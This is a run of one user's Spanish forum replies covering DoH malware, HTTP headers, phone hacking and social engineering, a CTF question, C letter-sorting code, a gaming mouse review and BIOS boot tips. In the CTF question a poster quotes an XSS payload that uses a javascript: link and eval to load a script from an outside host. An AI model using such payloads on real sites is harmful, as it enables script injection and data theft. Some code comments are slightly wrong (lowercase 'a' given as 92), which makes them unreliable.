Mensajes

Muy buen aporte Kub0x. Estoy seguro que no tardaremos en ver un montón de comentarios sobre DoH y malware. Mucha gente no lo conoce.

No tendrán bien puestas las cabeceras en la petición que hacen desde la web hacia el servidor. Puedes hacer tu la request con Curl, XMLHttpRequest,  etc.
https://developer.mozilla.org/es/docs/Web/API/XMLHttpRequest

Depende de lo que el servidor mire a la hora de responder. Verá que no tiene user-agent la petición y no responde.

Puedes intentat meter un proxy web de por medio. Por ejemplo con el servicio google webligth o algún traductor o servicio de proxy web que si use las cabeceras necesarias.

Es fallo común en varios satellite. Yo tengo 3 modelos que les pasa lo mismo. La batería se acabará muriendo del todo. No creo que tengas como arreglarlo. Cómprate un notebook. Los Asus van dpm.

Pd: Te petó el disco duro de fábrica y perdiste toda la info al poco de comprarlo.

Tiene pinta de IngSocial. Igual alguien del trabajo/colegio tomándote el pelo. Habrás usado la misma password que usas en el correo para tu usuario de Windows del colegio/trabajo, o loggearte en alguna de tus cuentas desde el colegio/trabajo. O alguien de cualquier web en la que te loggeases. Repites la misma contraseña para varios sitios?

A cerca de si es posible que te hacken a través de una llamada, sí es posible. También depende de con que protocolo se hizo la llamada. Podría no haber sido una "llamada" real. Si no una aplicación que tienes instalada utilizando alguna función del sistema operativo como TelephonyManager, callerUI, etc.
O hasta un "clon" tipo phishing. Como las webs fake que roban credenciales. Simplemente imitan la ventana que te salta al recibir una llamada y cuando le das a responder te reproduce un audio de una llamada grabada. No suele usarse para estas cosas.

También hay suplantaciones de redes de operadores, algo así como un "proxy espia" (explotando que los smartphone suelen tener la opción activada de seleccionar red de forma automática). Normalmente es gente de tu zona geográfica. No creo que sea tu caso.

Aunque el operador te diga que no te han hackeado no te fies. Siempre lo dicen, es una forma de mostrar falsa seguridad al cliente.

Necesitas aportar mucha más info para saber que pasó realmente pero apunta más a ingeniería social que a otra cosa.

Buenas tardes, hacee unos dias entre nuevamente de lleno al tema del hacking, y estoy realizando un par de retos de todo tipo. Ahorita estoy atascado en conseguir una flag.

El punto es el siguiente es un sitio que unicamente tiene un codigo javascript que regresa al mismo sitio.

El javascript es el siguiente

<a href="javascript:openNewWindow('hello.html');">Rompeme</a>


He intentado cambiar el script para intentar sacar un XSS de esta manera

<a href="javascript:eval('var a=document.createElement(\'script\');a.src=\'https://micodigo\';document.body.appendChild(a)')">Rompeme</a>

Al hacerlo obtengo un [object HTMLScriptElement] pero mi sitio no esta capturando nada.

¿Alguien podria darme una mano?


Gracias
Saludos!!

Estás intentando escribir un objeto en la web, debes escribir la url accediendo a ella (value del objeto).

De todas formas no creo que el reto busque que te lo pases así jaja. Me da a mi que el nombre de la función te está diciendo exactamente lo que quiere que hagas. Es obvio UwU. Seguro que te das cuenta:
https://excess-xss.com/
https://portswigger.net/web-security/cross-site-scripting/contexts
https://brutelogic.com.br/blog/alternative-javascript-pseudo-protocol/

Hay algo interesante, se le puede hacer return explicito al pseudoprotocolo. Lo que hace el pseudoprotocolo creo que es retornarte un objeto con la página, asique si lo haces explicitamente debería retornarte el resultado de la expresión directamente. O debería ser así por como está implementado el pseudoproto.

Más sencillo aún:

Código [Seleccionar] Expandir


int k, num
buleano escape
array de chars arrayChar(0 a 25)  // consideramos solo 26 letras o también la 'ñ'?

Bucle
num = ((pedir caracter al usuario) - 65).ToInt  // ó 97 si partes desde 'a' hasta 'z', etc... debes adaptarlo a lo que te pidan.

si ((num => 0)  y (num <=25)) 
    Si arrayChar(num) = ""
        arrayChar(num) = (num + 65).ToChar
        k +=1
        si k=26
            escape = TRUE
        fin si
    //Osi num = ???   //cierto carácter podría actuar como escape...(recuerda que restamos 65 al valor, para posicionarlo en su lugar en el array)
    //    escape = true   
    fin si
fin si
Repetir Mientras (escape = FALSE)  // una condición de salida basado en???

// volcar la salida:
bucle para k desde 0 hasta 25
    Si arrayChar(k) <> ""
       imprimir arrayChar(k)
    fin si
siguiente

 

Si pones "ana" te guarda "an" en vez de "aan" no?

Qué no os vendan la moto. Hay ratones por 15€ mejores que los de 50€ de la lista. U otros con mejor software y el mismo hardware más baratos.
En general dar por hecho que cualquier lista que os empieza hablando de colores, formas, y soportes os están vendiendo algo.

Y las reviews que no dediquen al menos unas palabras al polling rate, sensor y algo sobre grip, drift y G(ges de gravedad que soporta) no son reviews de calidad.

Sin ir más allá, hay ratones "gamming" de más de 200€ que no pueden competir con ratones de 8€. Literal, no exagero lo más mínimo ni me refiero a casos muy concretos o rebuscados.

Yo recomiendo el netway hero 2018 entre 25-30€.
122mm*68mm*38mm
Sensor Pmw3360 de 12.000dpi (chipset de 1000/2000/3000/4000/12000dpi) Se puede duplicar por software. (va decente)

También te permite desactivar la acceleración de windows (indispensable) directamente desde el software y ajustar la sensibilidad (sin multis ni saltos raros) ahí. 1000 polling rate y muy buena optimización de software (viene con CD para software pero funciona directamente sin él.

Tiene prácticamente 1ms de retardo y casi no tiene drift notable bajo mano experta ni a muy bajo dpi. Tiene un diseño que no sé si a propósito o de casualidad debido a diseño de ergonomics, que habilita a usar los grips más comunes sin problemas ni necesidad de reajustes. Tampoco trae agujeritos que se ensucian y hacen de ratones una p**a guarrada de sudor y piel muerta, ya que el diseño es bueno y no se escapa ni es incómodo con palm, fingertip, o claw. Algunos ratones te fuerzan a claw por diseño, este es cómodo de cualquier forma.

Se desliza muy bien, el cable es de un tamaño adecuado y resistente (yo lo habría hecho más corto). Me gusta mucho el diseño de la rueda/botón. Trae colores con animaciones con 12 colores y esas bobadas inútiles. Botones configurables con perfiles para DPI, y puedes cambiarlo como se suele conocer "on-the-fly". Está guay para tema gráfico y resoluciones enormes de pantalla.
Es un ratón competitivo y al que te adaptas muy fácil. Un ratón de 300€ no va a tener ninguna ventaja notable ni a máximo nivel aunque tenga alguna prestación un poco mejor.

Hay ratones más baratos con pocas diferencias, pero esas pocas diferencias se van sumando.
Buscar guia avanzada sobre configuración de ratones, sobre todo tema sensibilidad/resolución de pantalla.

Este es un ratón para jugar y para diseño gráfico. Para otra cosa tipo uso normal, ver videos, fotos, andar por redes sociales y ese tipo de cosas es preferible un inalámbrico barato (nunca más de 15€). No vas a notar diferencias y es mucho más cómodo.

Los char no dejan de ser números internamente. La letra A es el número 65, la B el 66...


Para ordenar yo buscaría si coincide el resultado con el esperado:

 

Código (c) [Seleccionar] Expandir

int diccionario[100];
  for(int i = 65 ; i <= 90; ++i)
  {
  diccionario[i-65] = i;
  }/* El resultado sería algo como:
diccionario[0] = 65;
diccionario[1] = 66;
...
diccionario[25] = 90;
*/

  for(int i = 97 ; i <= 122; ++i)
  {
  diccionario[i-71] = i;
  }/* El resultado sería algo como:
diccionario[0] = 65; Equivale a 'A'
diccionario[1] = 66; Equivale a 'B'
diccionario[25] = 90; Equivale a 'Z'
diccionario[26] = 97; Equivale a 'a'
diccionario[27] = 98;
...
diccionario[50]= 122; equivale a 'z'

Imprime los contenidos del array y los ajustas.*/


  if (caracter1 == diccionario[i])
  {
  resultado[x] = caracter1;
  }

Por si no queda claro, esto es lo mismo ue hacer:
HOLA

Código (c) [Seleccionar] Expandir

Está la A (int 65) en [0]? No.
{
No hacer nada.
}

Está la A (int 65) en [1]? No.
{
No hacer nada.
}

Está la A (int 65) en [2]? No.
{
No hacer nada.
}

Está la A (int 65) en [3]? Si.
{
ArrayResultado[0] = palabra[3];
}

Está la a (int 92) en [0]? No.
{
No hacer nada.
}

Está la a (int 92) en [1]? No.
{
No hacer nada.
}

Está la a (int 92) en [2]? No.
{
No hacer nada.
}

Está la a (int 92) en [3]? No
{
No hacer nada.
}

...


Básicamente vas mirando por orden alfabético cada letra del diccionario si está o no en todas las letras de la palabra.
Si encuentras la letra, esta se añade a un array resultado, que será el que contenga las letras ordenadas.

Tanto la lógica como la implementación es sencilla.


https://elcodigoascii.com.ar/
https://www.tutorialspoint.com/cprogramming/c_type_casting.htm

Es algo que pasa, pero de forma muy poco frecuente. Igual algo relacionado con el servidor. A mi me habrá pasado 4 veces. Hay un botón de marcar todos como leídos. Ten cuidado no darle sin querer.

No todas las placas soportan arranque por pendrive.
Si no te salta la bios y te salta el arranque del disco es que no estás pulsando las teclas para acceder a la BIOS, prueba combinaciones con las teclas control alt supr del. Quítale el disco duro para encontrar la convinación si no para de salirte el menú de windows y no lo das conseguido.
Mejor que uses un DVD en vez del pen